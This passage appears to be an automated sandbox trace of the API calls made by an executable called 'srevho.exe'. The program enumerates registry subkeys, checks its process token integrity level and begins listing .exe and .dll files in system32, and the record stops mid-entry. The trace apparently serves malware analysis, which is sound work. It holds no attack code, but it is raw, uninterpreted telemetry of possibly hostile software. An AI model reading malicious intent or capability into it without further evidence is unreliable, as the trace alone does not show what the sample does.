[0025.880] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0025.880] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0025.880] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0025.880] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9d88 | out: hHeap=0x5a0000) returned 1 [0025.880] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9d88 [0025.880] lstrcmpW (lpString1="agp", lpString2="drm") returned -1 [0025.880] lstrcmpW (lpString1="app", lpString2="drm") returned -1 [0025.880] lstrcmpW (lpString1="cmf", lpString2="drm") returned -1 [0025.880] lstrcmpW (lpString1="com", lpString2="drm") returned -1 [0025.880] lstrcmpW (lpString1="els", lpString2="drm") returned 1 [0025.880] lstrcmpW (lpString1="hal", lpString2="drm") returned 1 [0025.880] lstrcmpW (lpString1="lsa", lpString2="drm") returned 1 [0025.880] RegEnumKeyW (in: hKey=0x98, dwIndex=0x20, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0025.881] lstrlenW (lpString="MediaInterfaces") returned 15 [0025.881] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9da8 [0025.881] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0025.881] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0025.881] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9da8 | out: hHeap=0x5a0000) returned 1 [0025.881] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x22) returned 0x5ba4b0 [0025.881] lstrcmpW (lpString1="installers", lpString2="interfaces") returned -1 [0025.881] lstrcmpW (lpString1="categories", lpString2="interfaces") returned -1 [0025.881] RegEnumKeyW (in: hKey=0x98, dwIndex=0x21, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0025.881] lstrlenW (lpString="MediaProperties") returned 15 [0025.881] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9da8 [0025.881] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0025.881] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0025.881] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9da8 | out: hHeap=0x5a0000) returned 1 [0025.881] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x22) returned 0x5ba4e0 [0025.881] lstrcmpW (lpString1="installers", lpString2="properties") returned -1 [0025.881] lstrcmpW (lpString1="categories", lpString2="properties") returned -1 [0025.881] lstrcmpW (lpString1="interfaces", lpString2="properties") returned -1 [0025.881] RegEnumKeyW (in: hKey=0x98, dwIndex=0x22, lpName=0x18fd58, cchName=0x104 | out: lpName="MediaTypes") returned 0x0 [0025.881] lstrlenW (lpString="MediaTypes") returned 10 [0025.881] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9da8 [0025.881] lstrcmpW (lpString1="class", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="index", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="crash", lpString2="media") returned -1 [0025.881] lstrcmpW (lpString1="group", lpString2="media") returned -1 [0025.882] lstrcmpW (lpString1="order", lpString2="media") returned 1 [0025.882] lstrcmpW (lpString1="media", lpString2="media") returned 0 [0025.882] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9da8 | out: hHeap=0x5a0000) returned 1 [0025.882] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9da8 [0025.882] lstrcmpW (lpString1="class", lpString2="types") returned -1 [0025.882] lstrcmpW (lpString1="index", lpString2="types") returned -1 [0025.882] lstrcmpW (lpString1="crash", lpString2="types") returned -1 [0025.882] lstrcmpW (lpString1="group", lpString2="types") returned -1 [0025.882] lstrcmpW (lpString1="order", lpString2="types") returned -1 [0025.882] lstrcmpW (lpString1="media", lpString2="types") returned -1 [0025.882] RegEnumKeyW (in: hKey=0x98, dwIndex=0x23, lpName=0x18fd58, cchName=0x104 | out: lpName="MobilePC") returned 0x0 [0025.882] lstrlenW (lpString="MobilePC") returned 8 [0025.882] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5b4450 [0025.882] lstrcmpW (lpString1="backup", lpString2="mobile") returned -1 [0025.882] lstrcmpW (lpString1="device", lpString2="mobile") returned -1 [0025.882] lstrcmpW (lpString1="errata", lpString2="mobile") returned -1 [0025.882] lstrcmpW (lpString1="system", lpString2="mobile") returned 1 [0025.882] lstrcmpW (lpString1="layout", lpString2="mobile") returned -1 [0025.882] lstrcmpW (lpString1="config", lpString2="mobile") returned -1 [0025.882] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12) returned 0x5b9dc8 [0025.882] lstrcmpW (lpString1="id", lpString2="pc") returned -1 [0025.882] lstrcmpW (lpString1="co", lpString2="pc") returned -1 [0025.882] lstrcmpW (lpString1="db", lpString2="pc") returned -1 [0025.882] RegEnumKeyW (in: hKey=0x98, dwIndex=0x24, lpName=0x18fd58, cchName=0x104 | out: lpName="MPDEV") returned 0x0 [0025.882] lstrlenW (lpString="MPDEV") returned 5 [0025.882] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9de8 [0025.882] lstrcmpW (lpString1="class", lpString2="mpdev") returned -1 [0025.882] lstrcmpW (lpString1="index", lpString2="mpdev") returned -1 [0025.882] lstrcmpW (lpString1="crash", lpString2="mpdev") returned -1 [0025.882] lstrcmpW (lpString1="group", lpString2="mpdev") returned -1 [0025.882] lstrcmpW (lpString1="order", lpString2="mpdev") returned 1 [0025.882] lstrcmpW (lpString1="media", lpString2="mpdev") returned -1 [0025.882] lstrcmpW (lpString1="types", lpString2="mpdev") returned 1 [0025.883] RegEnumKeyW (in: hKey=0x98, dwIndex=0x25, lpName=0x18fd58, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0025.883] lstrlenW (lpString="MSDTC") returned 5 [0025.883] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9e08 [0025.883] lstrcmpW (lpString1="class", lpString2="msdtc") returned -1 [0025.883] lstrcmpW (lpString1="index", lpString2="msdtc") returned -1 [0025.883] lstrcmpW (lpString1="crash", lpString2="msdtc") returned -1 [0025.883] lstrcmpW (lpString1="group", lpString2="msdtc") returned -1 [0025.883] lstrcmpW (lpString1="order", lpString2="msdtc") returned 1 [0025.883] lstrcmpW (lpString1="media", lpString2="msdtc") returned -1 [0025.883] lstrcmpW (lpString1="types", lpString2="msdtc") returned 1 [0025.883] lstrcmpW (lpString1="mpdev", lpString2="msdtc") returned -1 [0025.883] RegEnumKeyW (in: hKey=0x98, dwIndex=0x26, lpName=0x18fd58, cchName=0x104 | out: lpName="MUI") returned 0x0 [0025.883] lstrlenW (lpString="MUI") returned 3 [0025.883] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9e28 [0025.883] lstrcmpW (lpString1="agp", lpString2="mui") returned -1 [0025.883] lstrcmpW (lpString1="app", lpString2="mui") returned -1 [0025.883] lstrcmpW (lpString1="cmf", lpString2="mui") returned -1 [0025.883] lstrcmpW (lpString1="com", lpString2="mui") returned -1 [0025.884] lstrcmpW (lpString1="els", lpString2="mui") returned -1 [0025.884] lstrcmpW (lpString1="hal", lpString2="mui") returned -1 [0025.884] lstrcmpW (lpString1="lsa", lpString2="mui") returned -1 [0025.884] lstrcmpW (lpString1="drm", lpString2="mui") returned -1 [0025.884] RegEnumKeyW (in: hKey=0x98, dwIndex=0x27, lpName=0x18fd58, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0025.884] lstrlenW (lpString="NetDiagFx") returned 9 [0025.884] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9e48 [0025.884] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0025.884] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9e68 [0025.884] lstrcmpW (lpString1="acpi", lpString2="diag") returned -1 [0025.884] lstrcmpW (lpString1="name", lpString2="diag") returned 1 [0025.884] lstrcmpW (lpString1="file", lpString2="diag") returned 1 [0025.884] lstrcmpW (lpString1="list", lpString2="diag") returned 1 [0025.884] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12) returned 0x5b9e88 [0025.884] lstrcmpW (lpString1="id", lpString2="fx") returned 1 [0025.884] lstrcmpW (lpString1="co", lpString2="fx") returned -1 [0025.884] lstrcmpW (lpString1="db", lpString2="fx") returned -1 [0025.884] lstrcmpW (lpString1="pc", lpString2="fx") returned 1 [0025.884] RegEnumKeyW (in: hKey=0x98, dwIndex=0x28, lpName=0x18fd58, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0025.884] lstrlenW (lpString="NetTrace") returned 8 [0025.884] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9ea8 [0025.884] lstrcmpW (lpString1="agp", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="app", lpString2="net") returned -1 [0025.884] lstrcmpW (lpString1="cmf", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="com", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="els", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="hal", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="lsa", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="drm", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="mui", lpString2="net") returned -1 [0025.885] lstrcmpW (lpString1="net", lpString2="net") returned 0 [0025.885] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b9ea8 | out: hHeap=0x5a0000) returned 1 [0025.885] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9ea8 [0025.885] lstrcmpW (lpString1="class", lpString2="trace") returned -1 [0025.885] lstrcmpW (lpString1="index", lpString2="trace") returned -1 [0025.885] lstrcmpW (lpString1="crash", lpString2="trace") returned -1 [0025.885] lstrcmpW (lpString1="group", lpString2="trace") returned -1 [0025.885] lstrcmpW (lpString1="order", lpString2="trace") returned -1 [0025.885] RegEnumKeyW (in: hKey=0x98, dwIndex=0x29, lpName=0x18fd58, cchName=0x104 | out: lpName="Network") returned 0x0 [0025.885] lstrlenW (lpString="Network") returned 7 [0025.885] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba528 [0025.885] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2a, lpName=0x18fd58, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0025.885] lstrlenW (lpString="NetworkProvider") returned 15 [0025.885] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba550 [0025.885] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2b, lpName=0x18fd58, cchName=0x104 | out: lpName="Nls") returned 0x0 [0025.885] lstrlenW (lpString="Nls") returned 3 [0025.885] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9ec8 [0025.885] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2c, lpName=0x18fd58, cchName=0x104 | out: lpName="NodeInterfaces") returned 0x0 [0025.886] lstrlenW (lpString="NodeInterfaces") returned 14 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9ee8 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2d, lpName=0x18fd58, cchName=0x104 | out: lpName="Nsi") returned 0x0 [0025.886] lstrlenW (lpString="Nsi") returned 3 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9f08 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2e, lpName=0x18fd58, cchName=0x104 | out: lpName="PCW") returned 0x0 [0025.886] lstrlenW (lpString="PCW") returned 3 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b9f28 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x2f, lpName=0x18fd58, cchName=0x104 | out: lpName="PnP") returned 0x0 [0025.886] lstrlenW (lpString="PnP") returned 3 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x12) returned 0x5b9f48 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x30, lpName=0x18fd58, cchName=0x104 | out: lpName="Power") returned 0x0 [0025.886] lstrlenW (lpString="Power") returned 5 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9f68 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x31, lpName=0x18fd58, cchName=0x104 | out: lpName="Print") returned 0x0 [0025.886] lstrlenW (lpString="Print") returned 5 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b9f88 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x32, lpName=0x18fd58, cchName=0x104 | out: lpName="PriorityControl") returned 0x0 [0025.886] lstrlenW (lpString="PriorityControl") returned 15 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5ba578 [0025.886] RegEnumKeyW (in: hKey=0x98, dwIndex=0x33, lpName=0x18fd58, cchName=0x104 | out: lpName="ProductOptions") returned 0x0 [0025.886] lstrlenW (lpString="ProductOptions") returned 14 [0025.886] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba5a0 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x34, lpName=0x18fd58, cchName=0x104 | out: lpName="Remote Assistance") returned 0x0 [0025.887] lstrlenW (lpString="Remote Assistance") returned 17 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5ba5f0 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x35, lpName=0x18fd58, cchName=0x104 | out: lpName="SafeBoot") returned 0x0 [0025.887] lstrlenW (lpString="SafeBoot") returned 8 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9fa8 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x36, lpName=0x18fd58, cchName=0x104 | out: lpName="ScsiPort") returned 0x0 [0025.887] lstrlenW (lpString="ScsiPort") returned 8 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5b9fe8 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x37, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurePipeServers") returned 0x0 [0025.887] lstrlenW (lpString="SecurePipeServers") returned 17 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5ba618 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0025.887] lstrlenW (lpString="SecurityProviders") returned 17 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5ba668 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0025.887] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba6b8 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0025.887] lstrlenW (lpString="ServiceProvider") returned 15 [0025.887] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba6e0 [0025.887] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0025.887] lstrlenW (lpString="Session Manager") returned 15 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba6e0 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0025.888] lstrlenW (lpString="SNMP") returned 4 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5ba048 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0025.888] lstrlenW (lpString="SQMServiceList") returned 14 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x22) returned 0x5bad40 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0025.888] lstrlenW (lpString="Srp") returned 3 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba068 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0025.888] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba088 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0025.888] lstrlenW (lpString="StillImage") returned 10 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5ba088 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0025.888] lstrlenW (lpString="Storage") returned 7 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba730 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0025.888] lstrlenW (lpString="SystemResources") returned 15 [0025.888] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5ba758 [0025.888] RegEnumKeyW (in: hKey=0x98, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0025.888] lstrlenW (lpString="TabletPC") returned 8 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5ba780 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0025.889] lstrlenW (lpString="Terminal Server") returned 15 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5ba7a8 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0025.889] lstrlenW (lpString="TimeZoneInformation") returned 19 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x16) returned 0x5ba0c8 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0025.889] lstrlenW (lpString="usbflags") returned 8 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5ba7f8 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0025.889] lstrlenW (lpString="usbstor") returned 7 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba820 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0025.889] lstrlenW (lpString="VAN") returned 3 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba108 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0025.889] lstrlenW (lpString="Video") returned 5 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5ba128 [0025.889] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0025.889] lstrlenW (lpString="wcncsvc") returned 7 [0025.889] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba848 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0025.890] lstrlenW (lpString="Wdf") returned 3 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba148 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0025.890] lstrlenW (lpString="WDI") returned 3 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba168 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0025.890] lstrlenW (lpString="Windows") returned 7 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1c) returned 0x5ba870 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0025.890] lstrlenW (lpString="Winlogon") returned 8 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5ba898 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0025.890] lstrlenW (lpString="WMI") returned 3 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba188 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0025.890] lstrlenW (lpString="hivelist") returned 8 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1e) returned 0x5ba8c0 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0025.890] lstrlenW (lpString="SystemInformation") returned 17 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5ba8e8 [0025.890] RegEnumKeyW (in: hKey=0x98, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0025.890] lstrlenW (lpString="Winresume") returned 9 [0025.890] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5ba8e8 [0025.891] RegEnumKeyW (in: hKey=0x98, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0025.891] RegCloseKey (hKey=0x98) returned 0x0 [0025.891] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" " [0025.891] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\srevho.exe\" ", wMatch=0x22) returned="\" " [0025.891] StrChrW (lpStart="\" ", wMatch=0x20) returned=" " [0025.891] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0025.891] GetVersion () returned 0x1db10106 [0025.891] GetCurrentProcess () returned 0xffffffff [0025.891] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff28 | out: TokenHandle=0x18ff28*=0x98) returned 1 [0025.891] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x14, TokenInformation=0x18ff20, TokenInformationLength=0x4, ReturnLength=0x18ff2c | out: TokenInformation=0x18ff20, ReturnLength=0x18ff2c) returned 1 [0025.891] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff2c | out: TokenInformation=0x0, ReturnLength=0x18ff2c) returned 0 [0025.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5ba1a8 [0025.891] GetTokenInformation (in: TokenHandle=0x98, TokenInformationClass=0x19, TokenInformation=0x5ba1a8, TokenInformationLength=0x14, ReturnLength=0x18ff2c | out: TokenInformation=0x5ba1a8, ReturnLength=0x18ff2c) returned 1 [0025.891] GetSidSubAuthorityCount (pSid=0x5ba1b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x5ba1b1 [0025.891] GetSidSubAuthority (pSid=0x5ba1b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x5ba1b8 [0025.891] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5ba1a8 | out: hHeap=0x5a0000) returned 1 [0025.891] CloseHandle (hObject=0x98) returned 1 [0025.891] lstrlenW (lpString="") returned 0 [0025.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5b9680 [0025.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff20 | out: lpSystemTimeAsFileTime=0x18ff20*(dwLowDateTime=0xb600d440, dwHighDateTime=0x1d64ac6)) [0025.891] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0025.891] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5bad70 [0025.891] GetWindowsDirectoryW (in: lpBuffer=0x5bad70, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0025.892] lstrcpyW (in: lpString1=0x5bad86, lpString2="system32" | out: lpString1="system32") returned="system32" [0025.892] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0025.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xfffe) returned 0x5baf98 [0025.892] lstrlenW (lpString="*.exe|*.dll") returned 11 [0025.892] lstrlenW (lpString=0x0) returned 0 [0025.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x1a) returned 0x5ba910 [0025.892] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x250) returned 0x5cafa0 [0025.892] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\*", lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5cb1f8 [0025.893] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, 